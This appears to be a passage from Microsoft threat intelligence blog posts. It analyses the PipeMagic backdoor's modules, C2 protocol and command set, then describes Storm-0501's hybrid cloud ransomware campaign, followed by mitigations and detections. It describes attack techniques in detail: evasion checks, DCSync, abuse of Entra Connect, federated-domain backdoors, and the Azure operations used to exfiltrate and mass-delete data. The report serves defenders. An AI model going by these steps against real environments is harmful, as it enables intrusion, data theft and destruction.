2
Unknown
43
3
Backdoor’s max up time
172800
4
Unknown
120
It’s currently unclear how blocks with indices 2 and 4 are used. These values do not appear to influence the malware’s core functionality. However, they are transmitted to the C2 server alongside system information during the initial connection.
The data in block index 1 is itself another configuration block. It contains the actual C2 address used by the malware, which is aaaaabbbbbbb.eastus[.]cloudapp.azure[.]com:443. This domain has been disabled by Microsoft.
Figure 6. Extracting configuration
Launching networking module
The backdoor does not communicate with C2 directly. Instead, it delegates this task to a network module in the network linked list.
First, it populates the network linked list with module nodes. Each node contains an executable module responsible for handling C2 communication.
In the sample analyzed, the network module data is embedded within the backdoor binary. This data is first XOR-decrypted using the following hardcoded 32-byte key, then decompressed using the aPLib compression algorithm.
00000000 91 df 5d 0e 9c 64 cd bd c2 46 f2 4b 6b ce 4a dc |.ß]..dͽÂFòKkÎJÜ|
00000010 aa 38 f9 60 0f e4 e4 98 ed 05 46 f1 ca d9 54 c5 |ª8ù`.ää.í.FñÊÙTÅ|
Figure 7. Decrypting network module data
Using the decrypted module data, the malware populates the following structure representing a module node in the network linked list.
struct network_module_node
{
__int64 module_index; // module index in network linked list
BYTE *module_base; // pointer to module base
__int64 module_size; // module size
__int64 module_main_func; // pointer to the main function
BYTE *module_entrypoint; // pointer to the module's entry point
BYTE terminate_flag; // terminate flag
};
Once the node is initialized and the module is loaded into memory, the malware executes the module’s entry point, passing a pointer to its own main function as a parameter.
Figure 8. Launching network module’s entry point
In the network module’s entry point, the module sets its third argument to its actual main function. This allows the backdoor to assign the module’s main function to the module_main_func field in the node structure, allowing the backdoor to call this function directly.
Figure 9. Network module’s entry point
Finally, the backdoor inserts the module node into the network linked list and invokes its main function, passing the C2 address extracted from the configuration.
Figure 10. Launching network module’s main function
Network module: Establishing C2 connection
When launched by the backdoor, the network module first exports and registers three of its internal functions for use by the backdoor:
A function to send data to the C2 server over TCP
A function that returns the constant value 0x8ca
A function to set a stop signal, instructing both the backdoor and the network module to terminate all C2 communications
The backdoor uses the first exported function to send data to the C2 server through the network module, rather than handling communication directly.
Figure 11. Network module’s exported functions
After initialization, the network module begins its communication routine with the C2 server. On each execution, it limits itself to a maximum of five communication attempts with the C2.
Once a TCP connection is established, the module sends the following HTTP GET request to initiate communication with the C2 server. The path includes a randomly generated 16-character hexadecimal string that is unique for each connection.
Figure 12. Setting up and sending initial GET request
Once a valid response is received from the C2 server, the network module transfers execution back to the backdoor. At this point, the backdoor collects system information and sends it to the C2 server using the network module’s communication function (annotated as C2_send_request in Figure 11).
System information collection
After the C2 connection is successfully established by the network module, the backdoor collects a comprehensive set of system and internal state information to send back to the C2 server:
Generated bot ID
Network module’s index in the network linked list
Operating system version
Computer name
Malware executable name
Malware process ID
Whether the host belongs to the Network Configuration Operators SID group
Domain NetBIOS name
Whether the malware is running as a 64-bit process
List of all LAN domain groups the host belongs to
Integrity level of the malware process
User domain name
Session ID of the malware process
Host’s IP address
Malware’s current working directory
Data from all nodes in the execute linked list
Data from all nodes in the unknown linked list
This host information is commonly collected by backdoors to be used as the host’s unique identifier when the malware attempts to establish a connection with its C2 server. Once this information is gathered, the PipeMagic backdoor invokes the network module’s communication function to transmit the data to the C2 server over the established TCP socket.
After the data is sent, execution is handed back to the network module, which waits for and receives the C2 response.
Finally, the network module transfers control back to the backdoor, passing along the C2 response so the backdoor can proceed with executing its core malicious capabilities.
Processing C2 response
Once the backdoor receives a response from the C2 server, it parses the data to extract the outer processing command. This command determines how the backdoor should handle the response and what actions to take next.
Below is a list of known processing codes and their corresponding functionalities:
Processing code
Processing data
Functionality
0x1
Backdoor code and data
Executes core backdoor functionality using modules from the execute and payload linked lists
0x3
Module index
Looks up a module node with the provided index and execute the module code
0x5
A message
Sends the received message back to the C2 server as an acknowledgment or echo
0x7
N/A
Shuts down the network module and stops all C2 communication
0x8
Backdoor code and data
Executes backdoor functionality using modules from the unknown linked list
0xA
Module node argument
Invokes all modules in the execute linked list with the specified argument
Backdoor capabilities: Execute and payload linked list
Among all the outer processing commands, processing code 0x1 is the most significant. When this code is received, the associated processing data contains inner backdoor commands and arguments that enable PipeMagic to perform a wide range of backdoor operations.
Below is a list of known backdoor codes and their corresponding functionalities:
Backdoor code
Backdoor arguments
Functionality
0x1
N/A
Retrieves metadata from all module nodes in the payload linked list
0x2
arg1: Module index arg2: Module data length arg3: Module name arg4: Module attribute arg5: Module SHA1 hash
Inserts a new module node into the payload linked list and initializes it with the provided data; Skips insertion if a matching module (by index and hash) already exists
0x3
arg1: Module index arg2: Hash flag arg3: Write offset arg4: Write length arg5: Payload data
Locates a module node in the payload linked list using the provided index and writes data at the specified offset; if the hash flag is provided, recomputes and updates the SHA-1 hash after RC4 encryption and aPLib compression (depending on the module’s attribute)
0x4
arg1: Module index arg2: Read offset arg3: Read length
Reads a segment of data from a module node in the payload linked list
0x5
arg1: Module index
Deletes a module node from the payload linked list
0x6
arg1: Module index arg2: Write offset arg3: Payload data arg4: Write length
Writes data to a module node without updating the SHA-1 hash
0x7
arg1: Module index
Retrieves the SHA-1 hash of a module node in the payload linked list
0x9
N/A
Retrieves data from all module nodes in the execute linked list
0xA
arg1: Module index
Retrieves data from a specific module node in the execute linked list
0xB
arg1: Payload module index arg2: Execute module index arg3: Initialization flag
Loads a payload module into memory and binds it to a node in the execute linked list, then invokes its entry point
0xC
arg1: Module index
Executes the entry point of a module node in the execute linked list
0xD
N/A
Retrieves the user’s domain name
0xE
N/A
Retrieves the current C2 processing code and data
0xF
N/A
Renames the malware executable to “:fuckit” and marks it for self-deletion
0x10
arg1: Lower index arg2: Upper index
Deletes all module nodes in the payload linked list within the specified index range
0x11
arg1: Module name
Deletes a module node in the payload linked list by name instead of index
0x13
N/A
Enumerates all running processes and collects session ID, PID, PPID, creation time, executable path, user domain, and architecture (32-bit or 64-bit)
0x14
arg1: Module index arg2: New module name arg3: Module hash length arg4: Module hash arg5: Pipe data to send arg6: Pipe name arg7: Max elapsed time
Replaces a module node in the payload linked list; sends data to a named pipe and parses the response to receive the payload module data
0x15
arg1: Module index arg2: New module name arg3: New module attribute arg4: Module hash length arg5: Module hash arg6: Module data length arg7: Module data
Replaces a module node in the payload linked list with a new one; the provided data is RC4-decrypted, aPLib-decompressed, and validated by SHA-1 hash before being added to the payload module node
0x16
N/A
Recollects system information (same as the initial C2 handshake)
0x17
arg1: Module index arg2: Pipe data 1 arg3: Pipe data 2 arg4: Max elapsed time arg5: Pipe name
Extracts and RC4-encrypts data from a module in the payload linked list; sends it to a named pipe along with the provided pipe data.
Backdoor results are delivered to C2 over TCP. These inner backdoor codes provide the threat actor with granular control over module management, execution, and system reconnaissance, making PipeMagic a highly modular and extensible backdoor.
Backdoor capabilities: Unknown linked list
Processing code 0x8 functions similarly to processing code 0x1 in that it also contains inner backdoor code and data. However, this command is specifically designed to interact with the unknown linked list.
The purpose of this linked list remains unclear. It does not appear to play a critical role in the malware’s core functionality on the infected system. Below is a list of known backdoor codes associated with this processing command and their corresponding functionalities:
Backdoor code
Backdoor arguments
Functionality
0x1
N/A
Retrieves metadata from all module nodes in the unknown linked list
0x2
arg1: Module index
Looks up a module node in the unknown linked list and extract its data
0x3
arg1: Module index
Deletes a module node from the unknown linked list using the specified index
0x7
arg1: Module index arg2: New module size
Resizes the data buffer of a module node in the unknown linked list, either expanding or shrinking it based on the provided size
While the exact role of this list remains unclear, its structure and command handling mirror those of the payload and execute linked lists, suggesting it may serve as a staging area or auxiliary buffer for dynamically loaded modules.
Mitigation and protection guidance
Microsoft recommends the following mitigations to reduce the impact of activity associated with PipeMagic and Storm-2460:
Ensure that tamper protection is enabled in Microsoft Defender for Endpoint.
Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume. Use Microsoft Defender Vulnerability Management to assess your current status and deploy any updates that might have been missed.
Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
Microsoft Defender XDR detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects this threat as the following malware:
PipeMagic (Win32/64)
Microsoft Defender for Endpoint
The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:
‘PipeMagic’ malware was detected
‘PipeMagic’ malware was prevented
An active ‘PipeMagic’ malware was blocked
An active ‘PipeMagic’ malware process was detected while executing and terminated
The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.
A file or network connection related to a ransomware-linked emerging threat activity group detected
Microsoft Defender Vulnerability Management
Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:
CVE-2025-29824
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.
Microsoft Threat Intelligence has observed financially motivated threat actor Storm-0501 continuously evolving their campaigns to achieve sharpened focus on cloud-based tactics, techniques, and procedures (TTPs). While the threat actor has been known for targeting hybrid cloud environments, their primary objective has shifted from deploying on-premises endpoint ransomware to using cloud-based ransomware tactics.
Unlike traditional on-premises ransomware, where the threat actor typically deploys malware to encrypt critical files across endpoints within the compromised network and then negotiates for a decryption key, cloud-based ransomware introduces a fundamental shift. Leveraging cloud-native capabilities, Storm-0501 rapidly exfiltrates large volumes of data, destroys data and backups within the victim environment, and demands ransom—all without relying on traditional malware deployment.
Storm-0501’s targeting is opportunistic. The threat actor initially deployed Sabbath ransomware in an attack against United States school districts in 2021. In November 2023, the actor targeted the healthcare sector. Over the years, the actor switched ransomware payloads multiple times, using Embargo ransomware in 2024 attacks.
In September 2024, we published a blog detailing how Storm-0501 extended its on-premises ransomware operations into hybrid cloud environments. The threat actor gained a foothold by compromising Active Directory environments and then pivoted to Microsoft Entra ID, escalating privileges on hybrid and cloud identities to gain global administrator privileges. The impact phase of these attacks took one of two forms: implanting backdoors in Entra ID tenant configurations using maliciously added federated domains to allow sign-in as nearly any user or deploying on-premises ransomware to encrypt endpoints and servers, eventually demanding ransom for the decryption keys.
Storm-0501 has continued to demonstrate proficiency in moving between on-premises and cloud environments, exemplifying how threat actors adapt as hybrid cloud adoption grows. They hunt for unmanaged devices and security gaps in hybrid cloud environments to evade detection and escalate cloud privileges and, in some cases, traverse tenants in multi-tenant setups to achieve their goals.
In this blog post, we describe the impact of a recent Storm-0501 attack on a compromised cloud environment. We trace how the threat actor achieved cloud-based ransomware impact through cloud privilege escalation, taking advantage of protection and visibility gaps across the compromised environment, and pivoting from on-premises to cloud pivots. Understanding how such attacks are conducted is critical in protecting cloud environments. Below we share protection and mitigation recommendations, including strengthening protections for cloud identities and cloud resources, and detection guidance across Microsoft security solutions to help organizations harden their networks against these attacks.
Figure 1. Overview of Storm-0501 cloud-based ransomware attack chain
On-premises compromise and pivot to the cloud
In a recent campaign, Storm-0501 compromised a large enterprise composed of multiple subsidiaries, each operating its own Active Directory domain. These domains are interconnected through domain trust relationships, enabling cross-domain authentication and resource access.
The cloud environment mirrors this complexity. Different subsidiaries maintain separate Microsoft Azure tenants, with varying Microsoft Defender product coverage. Notably, only one tenant had Microsoft Defender for Endpoint deployed, and devices from multiple Active Directory domains were onboarded to this single tenant’s license. This fragmented deployment created visibility gaps across the environment.
Active Directory domains were synchronized to several Entra ID tenants using Entra Connect Sync servers. In some cases, a single domain was synced to more than one tenant, further complicating identity management and monitoring. For clarity, this blog focuses on the two tenants impacted by the attack: one where on-premises activity was observed, and another where cloud-based activity occurred.
Figure 2. Storm-0501 on-premises attack chain
On-premises activity
For the purposes of this blog, we focus our analysis on the post-compromise phase of the on-premises attack, meaning that the threat actor had already achieved domain administrator privileges in the targeted domain. Read our previous blog for a more comprehensive overview of Storm-0501 tactics in on-premises environments.
The limited deployment of Microsoft Defender for Endpoint across the environment significantly hindered detection. Of the multiple compromised domains, only one domain had significant Defender for Endpoint deployment, leaving portions of the network unmonitored. On the few onboarded devices where Storm-0501 activity was observed, we noted that the threat actor conducted reconnaissance before executing malicious actions. Specifically, the threat actor used the following commands:
sc query sense sc query windefend
The threat actor checked for the presence of Defender for Endpoint services, suggesting a deliberate effort to avoid detection by targeting non-onboarded systems. This highlights the importance of comprehensive endpoint coverage.
Lateral movement was facilitated using Evil-WinRM, a post-exploitation tool that utilizes PowerShell over Windows Remote Management (WinRM) for remote code execution. The abovementioned commands were executed over sessions initiated with the tool, as well as discovery using other common native Windows tools and commands such as quser.exe and net.exe. Earlier in the attack, the threat actor had compromised an Entra Connect Sync server that was not onboarded to Defender for Endpoint. We assess that this server served as a pivot point, with the threat actor establishing a tunnel to move laterally within the network.
The threat actor also performed a DCSync attack, a technique that abuses the Directory Replication Service (DRS) Remote Protocol to simulate the behavior of a domain controller. By impersonating a domain controller, the threat actor could request password hashes for any user in the domain, including privileged accounts. This technique is often used to extract credentials without triggering traditional authentication-based alerts.
Pivot to the cloud
Following the on-premises compromise of the first tenant, the threat actor leveraged the Entra Connect Sync Directory Synchronization Account (DSA) to enumerate users, roles, and Azure resources within the tenant. This reconnaissance was performed using AzureHound, a tool designed to map relationships and permissions in Azure environments and consequently find potential attack paths and escalations.
Shortly thereafter, the threat actor attempted to sign in as several privileged users. These attempts were unsuccessful, blocked by Conditional Access policies and multifactor authentication (MFA) requirements. This suggests that while Storm-0501 had valid credentials, they lacked the necessary second factor or were unable to satisfy policy conditions.
Undeterred, Storm-0501 shifted tactics. Leveraging their foothold in the Active Directory environment, they traversed between Active Directory domains and eventually moved laterally to compromise a second Entra Connect server associated with different Entra ID tenant and Active Directory domain. The threat actor extracted the Directory Synchronization Account to repeat the reconnaissance process, this time targeting identities and resources in the second tenant.
Identity escalation
As a result of the discovery phase where the threat actor leveraged on-premises control to pivot across Active Directory domains and vastly enumerate cloud resources, they gained critical visibility of the organization’s security posture. They then identified a non-human synced identity that was assigned with the Global Administrator role in Microsoft Entra ID on that tenant. Additionally, this account lacked any registered MFA method. This enabled the threat actor to reset the user’s on-premises password, which shortly after was then legitimately synced to the cloud identity of that user using the Entra Connect Sync service. We identified that that password change was conducted by the Entra Connect’s Directory Synchronization Account (DSA), since the Entra Connect Sync service was configured on the most common mode Password-Hash Synchronization (PHS). Consequently, the threat actor was able to authenticate against Entra ID as that user using the new password.
Since no MFA was registered to that user, after successfully authenticating using the newly assigned password, the threat actor was redirected to simply register a new MFA method under their control. From then on, the compromised user had a registered MFA method that enabled the threat actor to meet MFA conditions and comply with the customer’s Conditional Access policies configuration per resource.
To access the Azure portal using the compromised Global Admin account, the threat actor had to bypass one more condition that was enforced by Conditional Access policies for that resource, which require authentication to occur from a Microsoft Entra hybrid joined device. Hybrid joined devices are devices that are joined to both the Active Directory domain and Entra ID. We observed failed authentication attempts coming from company devices that are either domain-joined or Entra-joined devices that did not meet the Conditional Access condition. The threat actor had to move laterally between different devices in the network, until we observed a successful sign-in to the Azure portal with the Global Admin account coming from a server that was hybrid joined.
From the point that the threat actor was able to successfully meet the Conditional Access policies and sign in to the Azure portal as a Global Admin account, Storm-0501 essentially achieved full control over the cloud domain. The threat actor then utilized the highest possible cloud privileges to obtain their goals in the cloud.
Figure 3. Storm-0501 cloud identity and cloud environment compromise leading to extortion
Cloud identity compromise: Entra ID
Cloud persistence
Following successful authentication as a Global Admin to the tenant, Storm-0501 immediately established a persistence mechanism. As was seen in the threat actor’s previous activity, Storm-0501 created a backdoor using a maliciously added federated domain, enabling them to sign in as almost any user, according to the ImmutableId user property. The threat actor leveraged the Global Administrator Entra role privileges and the AADInternals tool to register a threat actor-owned Entra ID tenant as a trusted federated domain by the targeted tenant. To establish trust between the two tenants, a threat actor-generated root certificate is provided to the victim tenant, which in turn is used to allow authentication requests coming from the threat actor-owned tenant. The backdoor enabled Storm-0501 to craft security assertion markup language (SAML) tokens applicable to the victim tenant, impersonating users in the victim tenant while assuming the impersonated user’s Microsoft Entra roles.
Cloud compromise: Azure
Azure initial access and privilege escalation
A tenant’s Entra ID and Azure environments are intertwined. And since Storm-0501 gained top-level Entra ID privileges, they could proceed to their final goal, which was to use cloud-based ransomware tactics for monetary gain. To achieve this goal, they had to find the organization’s valuable data stores, and these were residing in the cloud: in Azure.
Because they had compromised a user with the Microsoft Entra Global Administrator role, the only operation they had to do to infiltrate the Azure environment was to elevate their access to Azure resources. They elevated their access to Azure resources by invoking the Microsoft.Authorization/elevateAccess/action operation. By doing so, they gained the User Access Administrator Azure role over all the organization’s Azure subscriptions, including all the valuable data residing inside them.
To freely operate within the environment, the threat actor assigned themselves the Owner Azure role over all the Azure subscriptions available by invoking the Microsoft.Authorization/roleAssignments/write operation.
Discovery
After taking control over the organization’s Azure environment, we assess that the threat actor initiated a comprehensive discovery phase using various techniques, including the usage of the AzureHound tool, where they attempted to locate the organization’s critical assets, including data stores that contained sensitive information, and data store resources that are meant to back up on-premises and cloud endpoint devices. The threat actor managed to map out the Azure environment, including the understanding of existing environment protections, such as Azure policies, resource locks, Azure Storage immutability policies, and more.
Defense evasion
The threat actor then targeted the organization’s Azure Storage accounts. Using the public access features in Azure Storage, Storm-0501 exposed non-remotely accessible accounts to the internet and to their own infrastructure, paving the way for data exfiltration phase. They did this by utilizing the public access features in Azure Storage. To modify the Azure Storage account resources, the threat actor abused the Azure Microsoft.Storage/storageAccounts/write operation.
Credential access
For Azure Storage accounts that have key access enabled, the threat actor abused their Azure Owner role to access and steal the access keys for them by abusing the Azure Microsoft.Storage/storageAccounts/listkeys/action operation.
Exfiltration
After exposing the Azure Storage accounts, the threat actor exfiltrated the data in these accounts to their own infrastructure by abusing the AzCopy Command-line tool (CLI).
Impact
In on-premises ransomware, the threat actor typically deploys malware that encrypts crucial files on as many endpoints as possible, then negotiates with the victim for the decryption key. In cloud-based ransomware attacks, cloud features and capabilities give the threat actor the capability to quickly exfiltrate and transmit large amounts of data from the victim environment to their own infrastructure, destroy the data and backup cloud resources in the victim cloud environment, and then demand the ransom.
After completing the exfiltration phase, Storm-0501 initiated the mass-deletion of the Azure resources containing the victim organization data, preventing the victim from taking remediation and mitigation action by restoring the data. They do so by abusing the following Azure operations against multiple Azure resource providers:
Microsoft.Compute/snapshots/delete – Deletes Azure Snapshot, a read-only, point-in-time copy of an Azure VM’s disk (VHD), capturing its state and data at a specific moment, that exists independently from the source disk and can be used as a backup or clone of that disk.
Microsoft.Compute/restorePointCollections/delete – Deletes the Azure VM Restore Point, which stores virtual machines (VM) configuration and point-in-time application-consistent snapshots of all the managed disks attached to the VM.
Microsoft.Storage/storageAccounts/delete – Deletes the Azure storage account, which contains and organization’s Azure Storage data objects: blobs, files, queues, and tables. In all of Storm-0501 Azure campaigns we investigated, this is where they mainly focused, deleting as many Azure Storage account resources as possible in the environment.
Microsoft.RecoveryServices/Vaults/backupFabrics/protectionContainers/delete – Deletes an Azure recovery services vault protection container. A protection container is a logical grouping of resources (like VMs or workloads) that can be backed up together, within the Recovery Services vault.
During the threat actor’s attempts to mass-delete the data-stores/housing resources, they faced errors and failed to delete some of the resources due to the existing protections in the environment. These protections include Azure resource locks and Azure Storage immutability policies. They then attempted to delete these protections using the following operations:
Microsoft.Authorization/locks/delete – Deletes Azure resource locks, which are used to prevent accidental user deletion and modification of Azure subscriptions, resource groups, or resources. The lock overrides any user permission.
Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/delete – Deletes Azure storage immutability policies, which protect blob data from being overwritten or deleted.
After successfully deleting multiple Azure resource locks and Azure Storage immutability policies, the threat actor continued the mass deletion of the Azure data stores, successfully erasing resources in various Azure subscriptions. For resources that remained protected by immutability policies, the actor resorted to cloud-based encryption.
To perform cloud-based encryption, Storm-0501 created a new Azure Key Vault and a new Customer-managed key inside the Key Vault, which is meant to be used to encrypt the left Azure Storage accounts using the Azure Encryption scopes feature:
Microsoft.KeyVault/vaults/write – Creates or modifies an existing Azure Key Vault. The threat actor creates a new Azure key vault to host the encryption key.
Microsoft.Storage/storageAccounts/encryptionScopes/write – Creates or modifies Azure storage encryption scopes, which manage encryption with a key that is scoped to a container or an individual blob. When you define an encryption scope, you can specify whether the scope is protected with a Microsoft-managed key or with a customer-managed key that is stored in Azure Key Vault.
The threat actor abused the Azure Storage encryption scopes feature and encrypted the Storage blobs in the Azure Storage accounts. This wasn’t sufficient, as the organization could still access the data with the appropriate Azure permissions. In attempt to make the data inaccessible, the actor deletes the key that is used for the encryption. However, it’s important to note that Azure Key vaults and keys that are used for encryption purposes are protected by the Azure Key Vault soft-delete feature, with a default period of 90 days, which allows the user to retrieve the deleted key/vault from deletion, preventing cloud-based encryption for ransomware purposes.
After successfully exfiltrating and destroying the data within the Azure environment, the threat actor initiated the extortion phase, where they contacted the victims using Microsoft Teams using one of the previously compromised users, demanding ransom.
Mitigation and protection guidance
Microsoft recently implemented a change in Microsoft Entra ID that restricts permissions on the Directory Synchronization Accounts (DSA) role in Microsoft Entra Connect Sync and Microsoft Entra Cloud Sync. This change helps prevent threat actors from abusing Directory Synchronization Accounts in attacks to escalate privileges. Additionally, a new version released in May 2025 introduces modern authentication, allowing customers to configure application-based authentication for enhanced security (currently in public preview). It is also important to enable Trusted Platform Module (TPM) on the Entra Connect Sync server to securely store sensitive credentials and cryptographic keys, mitigating Storm-0501’s credential extraction techniques.
The techniques used by threat actors and described in this blog can be mitigated by adopting the following security measures:
Protecting on-premises
Turn on tamper protection features to prevent threat actors from stopping security services such as Microsoft Defender for Endpoint, which can help prevent hybrid cloud environment attacks such as Microsoft Entra Connect abuse.
Run endpoint detection and response (EDR) in block mode so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
Turn on investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to help remediate alerts, significantly reducing alert volume.
Protecting cloud identities
Secure accounts with credential hygiene: practice the principle of least privilege and audit privileged account activity in your Microsoft Entra ID and Azure environments to slow or stop threat actors.
Enable Conditional Access policies – Conditional Access policies are evaluated and enforced every time the user attempts to sign in. Organizations can protect themselves from attacks that leverage stolen credentials by enabling policies such as device compliance or trusted IP address requirements.
Set a Conditional Access policy to limit the access of Microsoft Entra ID Directory Synchronization Accounts (DSA) from untrusted IP addresses to all cloud apps. Please refer to the advanced hunting section and check the relevant query to get those IP addresses.
For Entra Connect Sync servers using application-based authentication, use Conditional Access for workload identities to restrict the application’s service principal from similar unauthorized access.
Ensure separate user accounts and mail forwarding for Global Administrator accounts. Global Administrator (and other privileged groups) accounts should be cloud-native accounts with no ties to on-premises Active Directory. See other best practices for using Privileged roles here.
Ensure all existing privileged users have an already registered MFA method to protect against malicious MFA registrations
Ensure Microsoft Defender for Cloud Apps connectors are turned on for your organization to receive alerts on the Microsoft Entra ID Directory Synchronization Account and all other users.
Enable protection to prevent by-passing of cloud Microsoft Entra MFA when federated with Microsoft Entra ID. This enhances protection against federated domains attacks.
Set the validatingDomains property of federatedTokenValidationPolicy to “all” to block attempts to sign-in to any non-federated domain (like .onmicrosoft.com) with SAML tokens.
If only Microsoft Entra ID performs MFA for a federated domain, set federatedIdpMfaBehavior to rejectMfaByFederatedIdp to prevent bypassing MFA CAPs.
Turn on Microsoft Entra ID protection to monitor identity-based risks and create risk-based Conditional Access policies to remediate risky sign-ins.
Protecting cloud resources
Use solutions like Microsoft Defender for Cloud to protect your cloud resources and assets from malicious activity, both in posture management, and threat detection capabilities.
Enable Microsoft Defender for Resource Manager as part of Defender for Cloud to automatically monitor the resource management operations in your organization. Defender for Resource Manager runs advanced security analytics to detect threats and alerts you about suspicious activity.
Enabling Defender for Resource Manager allows users to investigate Azure management operations within the Defender XDR, using the advanced hunting experience.
Utilize the Azure Monitor activity log to investigate and monitor Azure management events.
Utilize Azure policies for Azure Storage to prevent network and security misconfigurations and maximize the protection of business data stored in your storage accounts.
Enable Azure Monitor for Azure Blob Storage to collect, aggregate, and log data to enable recreation of activity trails for investigation purposes when a security incident occurs or network is compromised.
EnableAzure blob backup to protect from accidental or malicious deletions of blobs or storage accounts.
Apply the principle of least privilege when authorizing access to blob data in Azure Storage using Microsoft Entra and RBAC and configure fine-grained Azure Blob Storage access for sensitive data access through Azure ABAC.
Enable purge protection in Azure Key Vaults to prevent immediate, irreversible deletion of vaults and secrets. Use the default retention interval of 90 days.
Enable logs in Azure Key Vault and retain them for up to a year to enable recreation of activity trails for investigation purposes when a security incident occurs or network is compromised.
Enable Microsoft Azure Backup for virtual machines to protect the data on your Microsoft Azure virtual machines, and to create recovery points that are stored in geo-redundant recovery vaults.
General hygiene recommendations
Utilize Microsoft Security Exposure Management, available in the Microsoft Defender portal, with capabilities such as critical asset protection and attack path analysis that enable security teams to proactively reduce exposure and mitigate the impact of Storm-0501 hybrid attack tactics. In this case, each of the critical assets involved – Entra Connect server, users with DCSync permissions, Global Administrators – can be identified by relevant alerts and recommendations.
Investigate on-premises and hybrid Microsoft Security Exposure Management attack paths. Security teams can use attack path analysis to trace cross-domain threats that exploit the critical Entra Connect server to pivot into cloud workloads, escalate privileges, and expand their reach. Teams can use the ‘Chokepoint’ view in the attack path dashboard in Microsoft Security Exposure Management to highlight entities appearing in multiple paths.
Utilize the Critical asset management capability in Microsoft Security Exposure Management by configuring your own custom queries to pinpoint your organization’s business-critical assets according to your needs, such as business-critical Azure Storage accounts.
Microsoft Defender XDR detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Tactic
Observed activity
Microsoft Defender coverage
Initial access
– Suspicious sign-ins
Microsoft Defender XDR – Authentication with compromised credentials – Compromised user account in a recognized attack pattern – Malicious sign in from a risky IP address – Malicious sign in from an IP address associated with recognized attacker infrastructure – Malicious sign in from recognized attacker infrastructure -Malicious sign-in from an unusual user agent – Malicious sign-in from known threat actor IP address – Successful authentication from a malicious IP – Successful authentication from a suspicious IP – Successful authentication using compromised credentials – User compromised through session cookie hijack – User signed in from a known malicious IP Address – Suspicious Azure sign-in by user with active session on a device involved in a credential theft attempt
Microsoft Defender for Identity – Possibly compromised user account signed in – Possibly compromised service principal account signed in
Microsoft Defender for Cloud Apps – Suspicious login from AADInternals tool
Microsoft Defender for Cloud Defender for Resource Manager – Suspicious invocation of a high-risk ‘Initial Access’ operation detected (Preview) Defender for Storage – Access from an unusual location to a storage account – Access from an unusual location to a sensitive blob container – Access from a known suspicious IP address to a sensitive blob container – Access from a suspicious IP address – Unusual unauthenticated public access to a sensitive blob container
Execution
– Various types of execution-related suspicious activity by an attacker were observed – Crafting access tokens and executing actions against the cloud
Microsoft Defender for Endpoint – Compromised account conducting hands-on-keyboard attack – Potential human-operated malicious activity – Suspicious cmdlets launch using AADInternals
Persistence
– Federated domain backdoor was added
Microsoft Defender for Cloud Apps – Backdoor creation using AADInternals tool
Privilege escalation
– Elevated access to Azure resources – Assignment of Owner Azure role
Microsoft Defender XDR – Suspicious Azure elevate access operation by a user with an active session on a device involved in a credential theft attempt – Possibly compromised Microsoft Entra Connect Sync account elevated its access to Azure resources – Possibly compromised user elevated access to Azure resources
Microsoft Defender for Cloud Defender for Resource Manager – Suspicious elevate access operation – Suspicious invocation of a high-risk ‘Privilege Escalation’ operation detected (Preview) – Suspicious Azure role assignment detected (Preview)
Defense evasion
– Attempts to tamper with Microsoft Defender Antivirus – Manipulation of Azure Storage account configurations
Microsoft Defender for Endpoint – Attempt to turn off Microsoft Defender Antivirus protection
Microsoft Defender for Cloud Defender for Resource Manager – Suspicious invocation of a high-risk ‘Defense Evasion’ operation detected (Preview)
Credential access
– Entra Connect Sync server compromise and sync accounts extraction – Extracting credentials from remote machines – Executing DCSync operation against a domain controller – Access Azure Storage accounts access keys – Creation of a key inside an Azure Key Vault for encryption of Azure Storage data
Microsoft Defender for Endpoint – Entra Connect Sync credentials extraction attempt – Indication of local security authority secrets theft – Potential Entra Connect Tampering – Ongoing hands-on-keyboard attack using Impacket toolkit – Possible source of DCSync attack
Microsoft Defender for Identity – Suspected DCSync attack (replication of directory services)
Microsoft Defender for Cloud Apps – Compromised Microsoft Entra ID Cloud Sync account – AADInternals tool used by a Microsoft Entra Sync account – Entra Connect Sync account suspicious activity following a suspicious login – Suspicious sign-in to Microsoft Entra Connect Sync account
